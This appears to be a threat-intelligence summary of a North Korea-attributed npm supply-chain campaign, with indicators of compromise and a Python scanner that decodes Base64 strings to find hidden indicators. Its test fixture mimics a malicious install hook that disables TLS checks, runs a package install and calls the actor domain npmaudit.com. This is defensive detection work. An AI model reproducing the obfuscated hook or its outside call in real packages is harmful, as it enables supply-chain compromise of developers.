June’s Sophisticated npm Attack Attributed to North Korea

2023-07-22 Phylum

https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/


Phylum tied the sophisticated npm supply-chain campaign it documented in June 2023 to GitHub’s high-confidence attribution of that activity to Jade Sleet (also tracked as TraderTraitor), a threat actor operating in support of North Korean objectives. The actors targeted the personal accounts of technology-firm employees through social engineering, inviting victims to collaborate on GitHub repositories that depended on malicious npm packages the actors had published. The packages were released in coordinated pairs and had to be installed in a specific sequence to retrieve a token and download the final payload from actor-controlled infrastructure, which limited what researchers could observe. Phylum later identified related packages that used simple Base64 string obfuscation to hide code that created an .electron cache directory, disabled TLS rejection, installed ffi-napi on macOS, and fetched data from npmaudit[.]com. The activity shows how DPRK-linked actors abuse trusted open-source workflows, reaching cryptocurrency, blockchain, and technology targets through dependency execution rather than broad typosquatting.
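The Base64 string obfuscation described above is cheap to defeat at scan time: decode every quoted literal that is valid Base64 and match the decoded text against the report's indicators alongside the raw source. The following is an added example written for this page, not Phylum's tooling or code recovered from the packages. The fixture script is constructed to mirror the behaviours the report lists (the .electron directory, disabled TLS rejection, an ffi-napi install on macOS, and the npmaudit[.]com endpoint); the environment variable NODE_TLS_REJECT_UNAUTHORIZED is an assumption about how "disabled TLS rejection" would be implemented in Node, since the report does not quote the code.

```python
import base64
import binascii
import re

# Indicators taken from the report. The TLS variable name and the
# rejectUnauthorized option are assumptions about the likely implementation.
INDICATORS = {
    "electron_cache_dir": re.compile(r"\.electron"),
    "tls_rejection_disabled": re.compile(r"NODE_TLS_REJECT_UNAUTHORIZED|rejectUnauthorized"),
    "ffi_napi_install": re.compile(r"\bffi-napi\b"),
    "npmaudit_c2": re.compile(r"npmaudit\.com"),
}

# A quoted literal of 8+ Base64 alphabet characters with optional padding.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{8,}={0,2})["']""")


def decode_b64_literals(source):
    """Return (literal, decoded_text) for each quoted string that is valid
    Base64 and decodes to printable UTF-8. Binary-looking decodes are dropped
    so ordinary identifiers that happen to fit the alphabet do not leak in."""
    found = []
    for m in B64_LITERAL.finditer(source):
        lit = m.group(1)
        if len(lit) % 4:
            continue
        try:
            text = base64.b64decode(lit, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append((lit, text))
    return found


def scan(source):
    """Match every indicator against the raw source and against each decoded
    literal. Returns {indicator_name: [where_it_matched, ...]} where
    'where' is 'raw' or the Base64 literal that hid the string."""
    hits = {}
    corpus = [("raw", source)] + decode_b64_literals(source)
    for name, pattern in INDICATORS.items():
        for where, text in corpus:
            if pattern.search(text):
                hits.setdefault(name, []).append(where)
    return hits


def _b64(s):
    """Helper used only to build the constructed fixture below."""
    return base64.b64encode(s.encode()).decode()


# Constructed fixture (not recovered malware): an install-hook style script
# whose sensitive strings are Base64-wrapped, modelled on the report.
SAMPLE_SCRIPT = f'''
const b = (s) => Buffer.from(s, "base64").toString();
const cache = require("path").join(require("os").homedir(), b("{_b64('.electron')}"));
require("fs").mkdirSync(cache, {{ recursive: true }});
process.env[b("{_b64('NODE_TLS_REJECT_UNAUTHORIZED')}")] = "0";
if (process.platform === b("{_b64('darwin')}")) {{
  require("child_process").execSync(b("{_b64('npm install ffi-napi')}"));
}}
fetch(b("{_b64('https://npmaudit.com/api/v4/init')}"));
'''

if __name__ == "__main__":
    for name, where in scan(SAMPLE_SCRIPT).items():
        print(f"{name}: matched via {where}")
```

Running the script against the fixture reports all four indicators, each matched through a decoded literal rather than the raw text, which is exactly the case a plain substring scan misses. Pointing `scan()` at the contents of a package's install scripts and any file named in its `scripts` section is the practical use.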

Indicators of Compromise

Type     Value                              First Seen    Last Seen
DOMAIN   npmaudit.com                       2023-07-18    2023-08-02
URL      https://npmaudit.com/api/v4/init   2023-07-22    2023-07-27
